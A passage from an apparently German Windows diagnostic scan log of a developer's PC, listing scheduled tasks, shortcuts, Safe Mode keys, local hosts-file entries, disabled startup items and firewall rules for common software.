Task: {9F249450-92B1-4DBA-88DE-121F1A4B132F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {9F410326-0B97-4E78-9C42-A639922DF374} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {AAF8D936-E94A-48AE-B325-C308531AE1AB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-05-17] (Google Inc.)
Task: {B166EAB8-E139-40C4-AC68-0047413ECABD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-09-13] (Adobe Systems Incorporated)
Task: {B515325D-3D91-4BDA-B4E6-A38EF277CFCA} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
Task: {B8159701-6B6F-426F-941A-DCDF113DCF5B} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-12] (CyberLink Corp.)
Task: {C6C6200B-50DC-42E4-8C24-8C12A55928C7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {CE8FA03A-10FE-4BF2-BB2B-48648CD7B3E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-08-01] (HP Inc.)
Task: {D403547D-5BB3-4FCC-8727-9400B9257F1B} - System32\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001 => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupdate.exe [2017-10-01] (LogMeIn, Inc.)
Task: {DC483E08-E9BC-4674-9AB5-67837DA2DF3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {DF5369A0-C4F0-4B56-96CA-506A4CFE04F7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-05-17] (Google Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupload.exe
Task: C:\Windows\Tasks\HPCeeScheduleForxxxxxx.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
Shortcut: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ruby 2.1.7-p400\Interactive Ruby.lnk -> C:\projects\Ruby21\bin\irb.bat ()
ShortcutWithArgument: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ruby 2.1.7-p400\Start Command Prompt with Ruby.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /E:ON /K C:\projects\Ruby21\bin\setrbvars.bat
ShortcutWithArgument: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /k "C:\projects\nodejs\nodevars.bat"
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-03-13 16:11 - 2017-03-13 16:11 - 000052392 _____ () C:\projects\FileZilla FTP Client\fzshellext_64.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "UseAlternateShell"="1"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 04:34 - 2017-09-20 22:41 - 000001431 _____ C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 stockparser
127.0.0.1 code-sales.localhost
127.0.0.1 joomla360.localhost
127.0.0.1 dani.localhost
127.0.0.1 three83.localhost
127.0.0.1 threemotion.localhost
127.0.0.1 threeegoshooter.localhost
127.0.0.1 phalcon-devtools.localhost
127.0.0.1 phalcon.localhost
127.0.0.1 cakephp334.localhost
127.0.0.1 Pruefung2.localhost
127.0.0.1 xmlrpc.localhost
127.0.0.1 laraveloctobercms.localhost
127.0.0.1 laravelbootstrapcms.localhost
127.0.0.1 laravelitecms.localhost
127.0.0.1 typo3-876
127.0.0.1 typo3-7621
127.0.0.1 node-cluster-test
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdUpdaterSvc => 3
MSCONFIG\Services: MBAMService => 3
MSCONFIG\Services: omniserv => 2
MSCONFIG\Services: OracleMTSRecoveryService => 3
MSCONFIG\Services: OracleServiceXE => 3
MSCONFIG\Services: OracleXEClrAgent => 3
MSCONFIG\Services: OracleXETNSListener => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: BtServer => "C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe"
MSCONFIG\startupreg: OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
MSCONFIG\startupreg: OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
MSCONFIG\startupreg: SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe /hideui
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [{0D74785C-9042-4268-85E4-0E4640BA74F1}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{38C2B67E-D825-4E68-AF5C-2F47F356AFC8}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{917ADC9C-A01D-4DC5-AA2A-B5C40AAB24AC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0E82FA8E-4762-4A02-AEAF-0998D098D0FA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{0B39F97E-B129-41E4-9B3F-81EDE71637E4}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe
FirewallRules: [UDP Query User{69CB93C2-4F1F-4A01-83E3-622EE9F0E3E6}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe
FirewallRules: [TCP Query User{DCB0945B-D39E-4432-A443-7F0D5F458C56}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{F1050AA3-6575-47F5-9AB7-CC6CD3C71816}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{DB6A02D7-2B23-4F76-8235-35087FA42CCD}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{334ACB60-86F4-4FB8-8B12-C8DD735A3E49}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [TCP Query User{4D04777F-08EF-4C09-A005-D0C2C3DA0325}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{88425DAE-63DB-4FED-8539-54D255297B6C}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [TCP Query User{BEF979CA-B16E-48AD-8E3D-597897A8F344}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe
FirewallRules: [UDP Query User{1FFEF5E0-1C54-4335-80EE-5A433F5EB54F}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe
FirewallRules: [{9D61FC5D-FF16-4E5E-B269-B5300EBADBF3}] => (Block) C:\projects\Steinberg\Cubase 5\Cubase5.exe
FirewallRules: [{60245654-3571-4401-A1B8-CD88653A3ACC}] => (Allow) %SystemDrive%\projects\FileZilla FTP Client\filezilla.exe
FirewallRules: [{31BED353-A190-4D1E-895B-ECDFCB58F7B6}] => (Allow) %SystemDrive%\projects\FileZilla FTP Client\filezilla.exe
FirewallRules: [{C451BEF0-3594-40E7-BB78-DF7C62E4CADD}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe
FirewallRules: [{43E93339-5B15-4B35-B6A0-0B8ABB3C55ED}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe
FirewallRules: [{C4B59E77-A785-4927-9195-C7E3568F729A}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{4111D1E9-E2C0-4805-9101-21E38F0FA745}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6D04756B-5CAB-4DF8-AC07-DBE761729EB1}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{B649FF7D-7052-4AAF-ADC6-C8EA16F2684D}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{BD3CDD32-BCBA-44EE-A7E5-7D31FCA5B4ED}C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe] => (Allow) C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe
FirewallRules: [UDP Query User{FA11DB57-5E7F-4BB6-B743-5B693DB545E5}C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe] => (Allow) C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe
FirewallRules: [TCP Query User{8D8E3DE7-2161-40E7-BF2D-DCCC82D40858}C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe] => (Allow) C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe
FirewallRules: [UDP Query User{CDAFD342-4EDD-4691-BBAF-339335E0ED7B}C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe] => (Allow) C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe
FirewallRules: [TCP Query User{9C38E026-44F6-4033-A31C-AC8F8272FB16}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{ED81DBD9-97DB-4BB5-A717-9ABC85181065}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [{55417A5A-9FD1-41B6-B6DD-58D86B564918}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{FEF75C5F-E058-499D-BA6F-98F229B88242}] => (Allow) LPort=2869
FirewallRules: [{29A5991A-46CD-4FA4-9604-65B111B6EB76}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{3A971807-2F0E-4891-858F-FA70E1A46F15}C:\program files\java\jdk1.8.0_45\bin\jconsole.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\jconsole.exe
FirewallRules: [UDP Query User{3CC291D1-B385-437D-AA32-E91C052111A8}C:\program files\java\jdk1.8.0_45\bin\jconsole.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\jconsole.exe
FirewallRules: [TCP Query User{938A3455-83F0-4A60-90BE-F48B9920ECFA}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{F72EE96E-3F06-40F7-B381-96D40F125A95}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe
FirewallRules: [TCP Query User{8C3A7B97-82E4-41CE-BE49-F55DFB54AFB1}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{18D2B78A-FD18-40A5-8459-FE5CF9A9CDAD}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [{E865C8C7-0728-40B4-B2FF-DE17D4F73920}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Andy_45_Online\Setup.exe
FirewallRules: [{8F388D7A-2751-4173-9573-71940ECA0384}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Andy_45_Online\Setup.exe
FirewallRules: [{B39D2428-7B98-483C-A566-E94FA742BFD5}] => (Allow) C:\Program Files\Andy\Andy.exe
FirewallRules: [{C509E4DE-E290-4A49-AF62-44A518E91ED1}] => (Allow) C:\Program Files\Andy\Andy.exe
FirewallRules: [{68C1168D-A9F1-41B2-91A8-454E4664104E}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{E6B8E88D-276D-4895-ADC1-8932D48F9EDB}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{154035E8-4945-4C30-BD0F-FFCECA4EC200}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D604AD26-C384-4B9F-92B3-0A7A0D184635}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{84A9A199-1FC3-4D98-ACE9-82B3FF97D2B1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{7CF87F97-FCD1-4768-90DF-A8E2373A2147}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1E03FA34-3FBB-4DB2-BC20-ABEC719D37E9}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\Zoom.exe
FirewallRules: [{458D820F-EBED-48E1-A13D-792C0AA302E3}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\airhost.exe
FirewallRules: [TCP Query User{489A4ECE-20FD-4239-B9F7-DAF599573D88}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe
FirewallRules: [UDP Query User{A7BC3E9B-07A4-4962-A65E-AE6176D50B34}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe
FirewallRules: [TCP Query User{D5EF30F3-B20B-4978-A154-23DAC3EB617B}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{E624E795-519C-46F4-BAFC-6CDD89C53116}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe
FirewallRules: [{2233F6B7-D637-4831-9C07-E406BB0DF8E9}] => (Allow) C:\Program Files\Andy\Setup.exe
FirewallRules: [{D74FC659-B518-476F-9346-B8EE2FAF4240}] => (Allow) C:\Program Files\Andy\Setup.exe
FirewallRules: [{8EEEB06A-59D0-4940-AC48-3BE56B033EB0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5C33FE80-1CE2-45C0-A20B-5C00CD51F7A5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{FCD25967-8A4D-499D-BA00-516A6F319ED0}C:\projects\android studio\bin\studio64.exe] => (Allow) C:\projects\android studio\bin\studio64.exe
FirewallRules: [UDP Query User{A9814FC4-EC41-45C7-AEFB-346938734DA5}C:\projects\android studio\bin\studio64.exe] => (Allow) C:\projects\android studio\bin\studio64.exe
FirewallRules: [TCP Query User{F85661D0-9D16-4CAE-8C80-DEFB9C758B04}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [UDP Query User{F467E3E8-8999-4674-9005-9D35A78E0F93}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [TCP Query User{3BC7A836-13B4-4B2C-8456-CFC8B34E8795}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{53582B5E-0C13-44AF-8CBD-0AF7ED54BEE8}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe
FirewallRules: [TCP Query User{EF33B378-E6B7-43F9-90CF-325BB763702E}C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe
FirewallRules: [UDP Query User{6AF09766-87F3-4663-9C6D-86E369EE3C00}C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe
FirewallRules: [TCP Query User{443D20CC-B47B-4CA8-97E0-EC92CA4D0912}C:\program files\java\jre1.8.0_65\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\java.exe
FirewallRules: [UDP Query User{2B694035-F595-4B43-A426-01A5DD52E2A0}C:\program files\java\jre1.8.0_65\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\java.exe
FirewallRules: [TCP Query User{A68F388A-801E-45A8-A705-49E0A518C2D3}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [UDP Query User{4E85170A-DC55-404A-8800-578FD16440FB}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [TCP Query User{182A62A6-6E9F-423C-AC3C-86E50392A8EE}C:\program files\java\jdk1.7.0_79\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\javaw.exe
FirewallRules: [UDP Query User{9B8BDA23-4F9B-4E67-B3C1-84CDC6E1D966}C:\program files\java\jdk1.7.0_79\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\javaw.exe
FirewallRules: [TCP Query User{C7D02AC6-0C54-441C-BB82-1A4A245E1850}C:\program files\java\jdk1.7.0_79\bin\java.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\java.exe
FirewallRules: [UDP Query User{847013B0-8478-4ACD-A2F6-D45DA6189D8B}C:\program files\java\jdk1.7.0_79\bin\java.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\java.exe
FirewallRules: [TCP Query User{3898CDF4-5078-40A6-88F4-D66CDEE0EDA2}C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe] => (Allow) C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe
FirewallRules: [UDP Query User{2B759E54-216A-485A-9BA8-D50C92A7455D}C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe] => (Allow) C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe
FirewallRules: [TCP Query User{EC3A5250-7CA2-44B6-9B34-FCAECD6E266F}C:\projects\eclipse-4.5-fx\eclipse.exe] => (Allow) C:\projects\eclipse-4.5-fx\eclipse.exe
FirewallRules: [UDP Query User{F7463A27-B3C2-4340-ACA0-BB52E189A662}C:\projects\eclipse-4.5-fx\eclipse.exe] => (Allow) C:\projects\eclipse-4.5-fx\eclipse.exe
FirewallRules: [TCP Query User{C77069B5-A325-4E9F-9856-8C9BA738B498}C:\projects\ruby21\bin\ruby.exe] => (Allow) C:\projects\ruby21\bin\ruby.exe
FirewallRules: [UDP Query User{945BB5B6-E8F9-4954-818E-D32336A6E13C}C:\projects\ruby21\bin\ruby.exe] => (Allow) C:\projects\ruby21\bin\ruby.exe
FirewallRules: [TCP Query User{283C0B84-088C-4A5C-81D8-9D152487C0A8}C:\program files\mongodb\server\3.0\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.0\bin\mongod.exe
FirewallRules: [UDP Query User{4BBA386C-84E9-4792-A866-604A03E5C710}C:\program files\mongodb\server\3.0\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.0\bin\mongod.exe
FirewallRules: [TCP Query User{36E4D4C9-E9C3-4B75-8312-063FCD18B68F}C:\projects\nodejs\node.exe] => (Allow) C:\projects\nodejs\node.exe
FirewallRules: [UDP Query User{2D59D951-1C9A-4835-A664-5CB5A6DDC959}C:\projects\nodejs\node.exe] => (Allow) C:\projects\nodejs\node.exe
FirewallRules: [TCP Query User{6FD54DF5-E4BC-4F27-8D20-224E8C918460}C:\program files\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\javaw.exe
FirewallRules: [UDP Query User{C4918442-E161-41E1-BAC3-B8A757722785}C:\program files\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\javaw.exe
FirewallRules: [TCP Query User{4A0A2647-EFFF-4D8C-ACAE-E915FBD51D6E}C:\program files\java\jdk1.6.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\java.exe
FirewallRules: [UDP Query User{8A50EB32-E120-45B1-AA66-FE0DD11F09AD}C:\program files\java\jdk1.6.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\java.exe
FirewallRules: [TCP Query User{C44E03F4-5CF4-4CF9-9ADE-8E45DD59D6A1}C:\projects\androidstudio\bin\studio64.exe] => (Allow) C:\projects\androidstudio\bin\studio64.exe
FirewallRules: [UDP Query User{6A7D1F94-CBA6-4FEB-A6CF-01D8FF37970C}C:\projects\androidstudio\bin\studio64.exe] => (Allow) C:\projects\androidstudio\bin\studio64.exe
FirewallRules: [TCP Query User{85F2A625-2317-4EA7-ACC0-0B36D87A4AE8}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe
FirewallRules: [UDP Query User{ECC721F8-7E89-459E-9938-D2F14E9004F2}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe
FirewallRules: [TCP Query User{F3EF71C1-6198-4AF9-B2D8-FE78C870EF22}C:\xampp1835\apache\bin\httpd.exe] => (Allow) C:\xampp1835\apache\bin\httpd.exe
FirewallRules: [UDP Query User{CB36F1E2-5613-43D0-812F-84096D32D4F6}C:\xampp1835\apache\bin\httpd.exe] => (Allow) C:\xampp1835\apache\bin\httpd.exe
FirewallRules: [TCP Query User{27E4ECFC-AD5E-4F1F-97BC-EAA76C64B5AA}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{7CDC1499-595A-4901-95BA-176E6C1B9C58}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{E0FC54D4-11E6-40D1-9851-75CCDEF7721F}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe
FirewallRules: [{77C3365F-2303-496C-A8C7-64C9F6B4C6FA}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe
FirewallRules: [{CD6A7171-1AB4-4C3A-9C77-45BB63DB3BD4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{73E205FA-D93E-41BA-A973-F8604C90C07C}C:\projects\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\projects\android\androidstudio2.5\bin\studio64.exe
FirewallRules: [UDP Query User{71EDC5DC-DFDA-4342-A4BC-A43EFE7EE87B}C:\projects\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\projects\android\androidstudio2.5\bin\studio64.exe
FirewallRules: [TCP Query User{24134B00-D44B-46BC-A966-25AF6CCBFDFE}C:\xampp1835\mysql\bin\mysqld.exe] => (Allow) C:\xampp1835\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{07E9F50E-A0D9-48E8-B3FC-06C53D230B12}C:\xampp1835\mysql\bin\mysqld.exe] => (Allow) C:\xampp1835\mysql\bin\mysqld.exe
FirewallRules: [TCP Query User{E6F0E97E-0782-41C4-A08A-F26BD401A721}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{65C50F52-9D5D-4F2B-A358-AFA729416238}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{39692C32-3B6E-4C42-879F-4022C4D02D55}C:\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\android\androidstudio2.5\bin\studio64.exe
FirewallRules: [UDP Query User{AED017C6-ED77-4968-979B-8659BC3206A1}C:\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\android\androidstudio2.5\bin\studio64.exe
FirewallRules: [TCP Query User{E135B4A2-6CB7-4957-8532-1CD8F76517B9}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{744356D6-E55E-4E3B-B3A8-9A81A59EF659}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe
FirewallRules: [TCP Query User{3431425E-CF21-47E3-BEFF-BE2AA7A14354}C:\program files\java\jdk1.6.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{D1138DEA-C3BA-4348-90FF-C9DC9C14D5B4}C:\program files\java\jdk1.6.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\javaw.exe
FirewallRules: [{553671D7-0490-4E53-ADB4-78CEC55BCBF1}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [TCP Query User{5778EBAF-710B-4767-A685-D179CCD36BE4}C:\projects\unity\editor\unity.exe] => (Allow) C:\projects\unity\editor\unity.exe
